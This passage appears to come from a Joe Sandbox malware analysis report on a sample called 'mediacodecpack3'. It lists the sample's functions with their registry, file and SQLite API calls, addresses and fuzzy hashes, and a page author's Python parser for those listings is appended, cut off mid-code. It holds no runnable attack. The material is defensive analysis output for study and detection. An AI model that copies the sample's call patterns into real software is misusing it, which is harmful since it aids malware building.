                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                                            • String ID:
                                                                                            • API String ID: 1405322794-0
                                                                                            • Opcode ID: a7f65cb7445cccd64b7e944dca60e35566b8b57b34df754d540d7f2c83ca3b57
                                                                                            • Instruction ID: 5c28841a46ab2da66ff95157adad677bc0109b2659524fead2091257b5bd473a
                                                                                            • Opcode Fuzzy Hash: a7f65cb7445cccd64b7e944dca60e35566b8b57b34df754d540d7f2c83ca3b57
                                                                                            • Instruction Fuzzy Hash: A7E0ECB1D48604AFEB08EBA0D959F7E7776AF44311F2001C9F1019B2B0DEB4A944EE20
                                                                                            APIs
                                                                                            • RegQueryValueExA.KERNELBASE(?), ref: 0040D57B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue
                                                                                            • String ID:
                                                                                            • API String ID: 3660427363-0
                                                                                            • Opcode ID: edb662e5df4075614205ad4c2836f805a67019b38716de6e5ac022504569e8d8
                                                                                            • Instruction ID: 26b46432db68fc4713545f90ca74021cbfbc64d50c18903c1266e08affe4bc0b
                                                                                            • Opcode Fuzzy Hash: edb662e5df4075614205ad4c2836f805a67019b38716de6e5ac022504569e8d8
                                                                                            • Instruction Fuzzy Hash: 1BB092B0D48506EBCB014FA09D04A6DBA71BF44350722483A88A2B1160D7744105AA5A
APIs
• CreateDirectoryA.KERNELBASE ref: 00401E96
Memory Dump Source
• Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
Similarity
• API ID: CreateDirectory
• String ID:
• API String ID: 4241100979-0
• Opcode ID: 3de2052f2a00c726d227e4c4dd3299adb09deae8c3c4f630768cff51d50549a6
• Instruction ID: ac672658b327ef22b57dd8096845a6f62d9f9dd2f6b21eb8d4679538076b0d83
• Opcode Fuzzy Hash: 3de2052f2a00c726d227e4c4dd3299adb09deae8c3c4f630768cff51d50549a6
• Instruction Fuzzy Hash: 61A02220888330FBC0300AB00F0C8283008080838033200333A8B300C088FE080B2B8F
APIs
Memory Dump Source
• Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: 6c15b7e0cb941e7360e5b59663fee49a32cbf71ae8a53d536831a9755e68f830
• Instruction ID: caaeb3edd0182b104b1465d8a7214e334b93cb3688170f1009fa56cc25eb67fe
• Opcode Fuzzy Hash: 6c15b7e0cb941e7360e5b59663fee49a32cbf71ae8a53d536831a9755e68f830
• Instruction Fuzzy Hash: D3A00221954A01AAE1407BB2EB0AB383910A725706F15417B7296790E18E79014A595F
APIs
Memory Dump Source
• Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
Similarity
• API ID: CopyFile
• String ID:
• API String ID: 1304948518-0
• Opcode ID: 697de28deffca7a8713946bf57d344b2cffb3497efeb3799f2ec22fb237049b3
• Instruction ID: 13d0081663d5c949863e01e780637134611a7a95a1637e4bbe86339b43f74999
• Opcode Fuzzy Hash: 697de28deffca7a8713946bf57d344b2cffb3497efeb3799f2ec22fb237049b3
• Instruction Fuzzy Hash: E1900220604101AFD2000B225F4861536A45505B4171A483D5447E0064DA3980496519
APIs
Memory Dump Source
• Source File: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: 2697fc5bc034a1ffb4056f3d6960c569a4768683e8bbd70c4bae01e5f682b149
• Instruction ID: 578dd1ffac1f8e1011a1a5834bce6420265c4f34c8c97087b967ba0ca0ba6dfb
• Opcode Fuzzy Hash: 2697fc5bc034a1ffb4056f3d6960c569a4768683e8bbd70c4bae01e5f682b149
• Instruction Fuzzy Hash: 20900220604101DAE2040A725A082192654660464571149395447E0150DA3580095D29
APIs
Memory Dump Source
• Source File: 00000002.00000002.2982015287.0000000002BC8000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC8000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2bc8000_mediacodecpack3.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: d1371eba775403ce0a0b3a5e275b370c9632e350e192473b9c527866ef07340d
• Instruction ID: a8bf00e64f7e2993b61d62b4b8e680599bab041d86bcc135e3b8de31f6ebbcc7
• Opcode Fuzzy Hash: d1371eba775403ce0a0b3a5e275b370c9632e350e192473b9c527866ef07340d
• Instruction Fuzzy Hash: 4151BEF26086009FE7096E19DCD57BEF7E9EF98724F16092EE6C583340EA3558408A97
APIs
  • Part of subcall function 02BA0620: OpenEventA.KERNEL32(00100002,00000000,00000000,F874DD5C), ref: 02BA06C0
  • Part of subcall function 02BA0620: CloseHandle.KERNEL32(00000000), ref: 02BA06D5
  • Part of subcall function 02BA0620: ResetEvent.KERNEL32(00000000,F874DD5C), ref: 02BA06DF
  • Part of subcall function 02BA0620: CloseHandle.KERNEL32(00000000,F874DD5C), ref: 02BA0714
• TlsSetValue.KERNEL32(0000002B,?), ref: 02BA11BA
Memory Dump Source
• Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
Yara matches
Similarity
• API ID: CloseEventHandle$OpenResetValue
• String ID:
• API String ID: 1556185888-0
• Opcode ID: c8e0c6da93fcd2f75b905ebcbfed86c447ddb8e207f058bcb9fa02fdc5c1b2ad
• Instruction ID: 84511779c74fa3976e78aef45674c3baf6c19de94d6f8ed8e76b1aeab46751a1
• Opcode Fuzzy Hash: c8e0c6da93fcd2f75b905ebcbfed86c447ddb8e207f058bcb9fa02fdc5c1b2ad
• Instruction Fuzzy Hash: D5018F71A44204AFD710DF5DDC55B5ABBB8EB096B1F104AAAF829E3380D771A9008AA0
APIs
Memory Dump Source
• Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
Similarity
• API ID: InfoSleepStartup
• String ID:
• API String ID: 3346105675-0
• Opcode ID: 820f2d36c53b95829267cfd4d46e36cd9cb5e965e78971ddadb887229b3ef415
• Instruction ID: 9a29c4e619f7a4d8ed8324ebca556abd9c53da00443e6c512cbb7d8c9fa3b2b6
• Opcode Fuzzy Hash: 820f2d36c53b95829267cfd4d46e36cd9cb5e965e78971ddadb887229b3ef415
• Instruction Fuzzy Hash: 8FE08670C06245C6D724CEDC97243AAB3306748306F680137D107762D9C23D8D4EDA1F
APIs
• VirtualAlloc.KERNELBASE(00000000), ref: 0040184D
Memory Dump Source
• Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 91fd1d15897780a22772685a9e9e11523d47d63b978241df2ce472f9aad5acef
• Instruction ID: 3b235d091506e9fd49973954eb1e1228e6c7b9fea26647d7565d0fb406e94443
• Opcode Fuzzy Hash: 91fd1d15897780a22772685a9e9e11523d47d63b978241df2ce472f9aad5acef
• Instruction Fuzzy Hash: 16D01271849504DFDF084FF4CA48ADDBF30BB10701F110466E906BA1A1CB7CD947AB05
APIs
• Sleep.KERNELBASE(000003E8), ref: 0040D1CF
Memory Dump Source
• Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 8eeb56a042a3dc7536f4384a1371a3b7fda40716cbfa0a1f94c25bc104d3c431
• Instruction ID: fcb18d1d78468dbf9f57a7137ce4b137392d6aea0d2686bddcdc2e81c808b1ca
• Opcode Fuzzy Hash: 8eeb56a042a3dc7536f4384a1371a3b7fda40716cbfa0a1f94c25bc104d3c431
• Instruction Fuzzy Hash: 20B09234955B409BE28267A08AC96BC7760AB54300F601522AA12A91C08E785A47A50B
APIs
• sqlite3_malloc.SQLITE3 ref: 609674C6
  • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
  • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
  • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
  • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
• sqlite3_step.SQLITE3 ref: 6096755A
• sqlite3_malloc.SQLITE3 ref: 6096783A
• sqlite3_bind_int64.SQLITE3 ref: 609678A8
• sqlite3_column_bytes.SQLITE3 ref: 609678E8
• sqlite3_column_blob.SQLITE3 ref: 60967901
• sqlite3_column_int64.SQLITE3 ref: 6096791A
• sqlite3_column_int64.SQLITE3 ref: 60967931
• sqlite3_column_int64.SQLITE3 ref: 60967950
• sqlite3_step.SQLITE3 ref: 609679C3
• sqlite3_bind_int64.SQLITE3 ref: 60967AA9
• sqlite3_step.SQLITE3 ref: 60967AB4
• sqlite3_column_int.SQLITE3 ref: 60967AC7
• sqlite3_reset.SQLITE3 ref: 60967AD4
• sqlite3_bind_int.SQLITE3 ref: 60967B89
• sqlite3_step.SQLITE3 ref: 60967B94
• sqlite3_column_int64.SQLITE3 ref: 60967BB0
• sqlite3_column_int64.SQLITE3 ref: 60967BCF
• sqlite3_column_int64.SQLITE3 ref: 60967BE6
• sqlite3_column_bytes.SQLITE3 ref: 60967C05
• sqlite3_column_blob.SQLITE3 ref: 60967C1E
  • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED50
• sqlite3_bind_int64.SQLITE3 ref: 60967C72
• sqlite3_step.SQLITE3 ref: 60967C7D
• memcmp.MSVCRT ref: 60967D4C
• sqlite3_free.SQLITE3 ref: 60967D69
• sqlite3_free.SQLITE3 ref: 60967D74
• sqlite3_free.SQLITE3 ref: 60967FF7
• sqlite3_free.SQLITE3 ref: 60968002
  • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
  • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
  • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
  • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
  • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
• sqlite3_reset.SQLITE3 ref: 60967C93
  • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
  • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
• sqlite3_reset.SQLITE3 ref: 60967CA7
• sqlite3_reset.SQLITE3 ref: 60968035
• sqlite3_bind_int64.SQLITE3 ref: 60967B72
  • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
• sqlite3_bind_int64.SQLITE3 ref: 6096809D
• sqlite3_bind_int64.SQLITE3 ref: 609680C6
• sqlite3_step.SQLITE3 ref: 609680D1
• sqlite3_column_int.SQLITE3 ref: 609680F3
• sqlite3_reset.SQLITE3 ref: 60968104
• sqlite3_step.SQLITE3 ref: 60968139
• sqlite3_column_int64.SQLITE3 ref: 60968151
• sqlite3_reset.SQLITE3 ref: 6096818A
  • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED2B
  • Part of subcall function 6095ECA6: sqlite3_bind_value.SQLITE3 ref: 6095EDDF
• sqlite3_reset.SQLITE3 ref: 609679E9
  • Part of subcall function 609160CD: sqlite3_realloc.SQLITE3 ref: 609160EF
• sqlite3_column_bytes.SQLITE3 ref: 60967587
  • Part of subcall function 6091D5DC: sqlite3_value_bytes.SQLITE3 ref: 6091D5F4
• sqlite3_column_blob.SQLITE3 ref: 60967572
  • Part of subcall function 6091D57E: sqlite3_value_blob.SQLITE3 ref: 6091D596
• sqlite3_reset.SQLITE3 ref: 609675B7
• sqlite3_bind_int.SQLITE3 ref: 60967641
• sqlite3_step.SQLITE3 ref: 6096764C
• sqlite3_column_int64.SQLITE3 ref: 6096766E
• sqlite3_reset.SQLITE3 ref: 6096768B
• sqlite3_bind_int.SQLITE3 ref: 6096754F
  • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
• sqlite3_bind_int.SQLITE3 ref: 609690B2
• sqlite3_bind_blob.SQLITE3 ref: 609690DB
• sqlite3_step.SQLITE3 ref: 609690E6
• sqlite3_reset.SQLITE3 ref: 609690F1
• sqlite3_free.SQLITE3 ref: 60969102
• sqlite3_free.SQLITE3 ref: 6096910D
Strings
Memory Dump Source
• Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
Similarity
• API ID: sqlite3_reset$sqlite3_step$sqlite3_column_int64sqlite3_free$sqlite3_bind_int64$sqlite3_bind_int$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mprintf$sqlite3_column_intsqlite3_mutex_leave$memcmpsqlite3_bind_blobsqlite3_bind_valuesqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_initializesqlite3_mutex_entersqlite3_prepare_v2sqlite3_reallocsqlite3_value_blobsqlite3_value_bytes
• String ID: $d
• API String ID: 2451604321-2084297493
• Opcode ID: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
• Instruction ID: 6b7ea73e19bc996eb6a422b8fcf26663d3cb25e4dd91ceba81a4d6a678ae72ab
• Opcode Fuzzy Hash: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
• Instruction Fuzzy Hash: 2CF2CF74A152288FDB54CF68C980B9EBBF2BF69304F1185A9E888A7341D774ED85CF41
                                                                                            APIs
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6096A64C
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6096A656
                                                                                            • sqlite3_strnicmp.SQLITE3 ref: 6096A682
                                                                                            • sqlite3_strnicmp.SQLITE3 ref: 6096A6BC
                                                                                            • sqlite3_mprintf.SQLITE3 ref: 6096A6F9
                                                                                            • sqlite3_malloc.SQLITE3 ref: 6096A754
                                                                                            • sqlite3_step.SQLITE3 ref: 6096A969
                                                                                            • sqlite3_free.SQLITE3 ref: 6096A9AC
                                                                                            • sqlite3_finalize.SQLITE3 ref: 6096A9BB
                                                                                            • sqlite3_strnicmp.SQLITE3 ref: 6096B04A
                                                                                              • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                              • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                                              • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                            • sqlite3_value_int.SQLITE3 ref: 6096B241
                                                                                            • sqlite3_malloc.SQLITE3 ref: 6096B270
                                                                                            • sqlite3_bind_null.SQLITE3 ref: 6096B2DF
                                                                                            • sqlite3_step.SQLITE3 ref: 6096B2EA
                                                                                            • sqlite3_reset.SQLITE3 ref: 6096B2F5
                                                                                            • sqlite3_value_int.SQLITE3 ref: 6096B43B
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6096B530
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6096B576
                                                                                            • sqlite3_free.SQLITE3 ref: 6096B5F4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_stepsqlite3_strnicmp$sqlite3_freesqlite3_mallocsqlite3_resetsqlite3_value_bytessqlite3_value_intsqlite3_value_text$sqlite3_bind_intsqlite3_bind_nullsqlite3_finalizesqlite3_mprintf
                                                                                            • String ID: optimize
                                                                                            • API String ID: 1540667495-3797040228
                                                                                            • Opcode ID: ab382b16e3f59fac809a38361d516dac1e6c4c02a096abfb60effccae4f38c9b
                                                                                            • Instruction ID: 15d53f9c7948a495e2c6926a79545eea34293df74e7a3e63ea56b3727437b729
                                                                                            • Opcode Fuzzy Hash: ab382b16e3f59fac809a38361d516dac1e6c4c02a096abfb60effccae4f38c9b
                                                                                            • Instruction Fuzzy Hash: 54B2F670A142198FEB14DF68C890B9DBBF6BF68304F1085A9E889AB351E774DD85CF41
                                                                                            APIs
                                                                                            • sqlite3_finalize.SQLITE3 ref: 60966178
                                                                                            • sqlite3_free.SQLITE3 ref: 60966183
                                                                                            • sqlite3_value_numeric_type.SQLITE3 ref: 609661AE
                                                                                            • sqlite3_value_numeric_type.SQLITE3 ref: 609661DE
                                                                                            • sqlite3_value_text.SQLITE3 ref: 60966236
                                                                                            • sqlite3_value_int.SQLITE3 ref: 60966274
                                                                                            • memcmp.MSVCRT ref: 6096639E
                                                                                              • Part of subcall function 60940A5B: sqlite3_malloc.SQLITE3 ref: 60940AA1
                                                                                              • Part of subcall function 60940A5B: sqlite3_free.SQLITE3 ref: 60940C1D
                                                                                            • sqlite3_mprintf.SQLITE3 ref: 60966B51
                                                                                            • sqlite3_mprintf.SQLITE3 ref: 60966B7D
                                                                                              • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                                              • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_numeric_type$memcmpsqlite3_finalizesqlite3_initializesqlite3_mallocsqlite3_value_intsqlite3_value_textsqlite3_vmprintf
                                                                                            • String ID: ASC$DESC$x
                                                                                            • API String ID: 4082667235-1162196452
                                                                                            • Opcode ID: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                                            • Instruction ID: 01f4316cc9c65235d83944c747b96ccca9397e1276bdc6c450b31a73d7ca280a
                                                                                            • Opcode Fuzzy Hash: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                                            • Instruction Fuzzy Hash: AD921274A14319CFEB10CFA9C99079DBBB6BF69304F20816AD858AB342D774E985CF41
                                                                                            APIs
                                                                                            • sqlite3_bind_int64.SQLITE3(?,?), ref: 609693A5
                                                                                            • sqlite3_step.SQLITE3(?,?), ref: 609693B0
                                                                                            • sqlite3_column_int64.SQLITE3(?,?), ref: 609693DC
                                                                                              • Part of subcall function 6096A2BD: sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                              • Part of subcall function 6096A2BD: sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                              • Part of subcall function 6096A2BD: sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                              • Part of subcall function 6096A2BD: sqlite3_reset.SQLITE3 ref: 6096A354
                                                                                            • sqlite3_reset.SQLITE3(?,?), ref: 609693F3
                                                                                            • sqlite3_malloc.SQLITE3(?), ref: 60969561
                                                                                            • sqlite3_malloc.SQLITE3(?), ref: 6096958D
                                                                                            • sqlite3_step.SQLITE3(?), ref: 609695D2
                                                                                            • sqlite3_column_int64.SQLITE3(?), ref: 609695EA
                                                                                            • sqlite3_reset.SQLITE3(?), ref: 60969604
                                                                                            • sqlite3_realloc.SQLITE3(?), ref: 609697D0
                                                                                            • sqlite3_realloc.SQLITE3(?), ref: 609698A9
                                                                                              • Part of subcall function 609129D5: sqlite3_initialize.SQLITE3(?,?,?,60915F55,?,?,?,?,?,?,00000000,?,?,?,60915FE2,00000000), ref: 609129E0
                                                                                            • sqlite3_bind_int64.SQLITE3(?,?), ref: 609699B8
                                                                                            • sqlite3_bind_int64.SQLITE3(?), ref: 6096934D
                                                                                              • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                            • sqlite3_bind_int64.SQLITE3(?,?), ref: 60969A6A
                                                                                            • sqlite3_step.SQLITE3(?,?), ref: 60969A75
                                                                                            • sqlite3_reset.SQLITE3(?,?), ref: 60969A80
                                                                                            • sqlite3_free.SQLITE3(?), ref: 60969D41
                                                                                            • sqlite3_free.SQLITE3(?), ref: 60969D4C
                                                                                            • sqlite3_free.SQLITE3(?), ref: 60969D5B
                                                                                              • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                              • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                              • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_bind_int64$sqlite3_freesqlite3_resetsqlite3_step$sqlite3_column_int64sqlite3_mallocsqlite3_realloc$sqlite3_column_intsqlite3_initializesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2
                                                                                            • String ID:
                                                                                            • API String ID: 961572588-0
                                                                                            • Opcode ID: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                                            • Instruction ID: dba6eef834311e7f80380fc62c490a647dd1765b4da9a7e0a506f520bf28697a
                                                                                            • Opcode Fuzzy Hash: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                                            • Instruction Fuzzy Hash: 9872F275A042298FDB24CF69C88078DB7F6FF98314F1586A9D889AB341D774AD81CF81
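The "APIs" listings in these records are the raw material for function similarity, and the "API ID" line that follows each one is derived from them. The parser below is an added example written for this page, not part of the Joe Sandbox report or of Joe Security's tooling. It reads the bulleted call lines as they appear above (direct calls and "Part of subcall function" entries, with their module tag, optional argument column and ref address) and rebuilds the API ID string. The rebuild rule, count every API name including subcall entries, order tiers by count with "$" between them, and sort names inside a tier, is inferred from comparing the listings and API ID lines on this page; it is an assumption about the report format, not documented Joe Sandbox behaviour. The sample inputs are copied from the records for the functions at 6094B488 and 6094A72B below.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# One bullet of a Joe Sandbox "APIs" listing, e.g.
#   • sqlite3_step.SQLITE3(?,?), ref: 609693B0
#   • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,00000000), ref: 6094B6B5
_API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function\s+(?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str                      # imported function name, e.g. sqlite3_step
    module: str                   # module tag after the dot, e.g. SQLITE3
    ref: int                      # address of the call site
    args: List[str]               # argument column as printed ("?" = unresolved)
    parent: Optional[int] = None  # callee address for a "Part of subcall" entry


def parse_api_block(text: str) -> List[ApiCall]:
    """Parse the bullets of one APIs listing; lines that are not calls (headers) are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = _API_LINE.match(line)
        if not m:
            continue
        args = m["args"].split(",") if m["args"] is not None else []
        parent = int(m["parent"], 16) if m["parent"] else None
        calls.append(ApiCall(m["api"], m["module"], int(m["ref"], 16), args, parent))
    return calls


def api_id(calls: List[ApiCall]) -> str:
    """Rebuild a record's "API ID" from its calls.

    Rule inferred from the records on this page (assumption, not Joe Sandbox
    documentation): count each API name over all bullets, subcall entries
    included; tiers with a higher count come first and are joined with '$';
    inside a tier the names are sorted and concatenated without a separator.
    """
    counts = Counter(c.api for c in calls)
    tiers: Dict[int, List[str]] = {}
    for name, n in counts.items():
        tiers.setdefault(n, []).append(name)
    return "$".join("".join(sorted(tiers[n])) for n in sorted(tiers, reverse=True))


def direct_sequence(calls: List[ApiCall]) -> List[Tuple[int, str]]:
    """Direct (non-subcall) calls in listing order: shows the bind/step/reset cycle."""
    return [(c.ref, c.api) for c in calls if c.parent is None]


# Sample input copied from the record for the function at 6094B488 on this page.
SAMPLE_REUSE = """\
• sqlite3_bind_int64.SQLITE3 ref: 6094B488
• sqlite3_step.SQLITE3 ref: 6094B496
• sqlite3_reset.SQLITE3 ref: 6094B4A4
• sqlite3_bind_int64.SQLITE3 ref: 6094B4D2
• sqlite3_step.SQLITE3 ref: 6094B4E0
• sqlite3_reset.SQLITE3 ref: 6094B4EE
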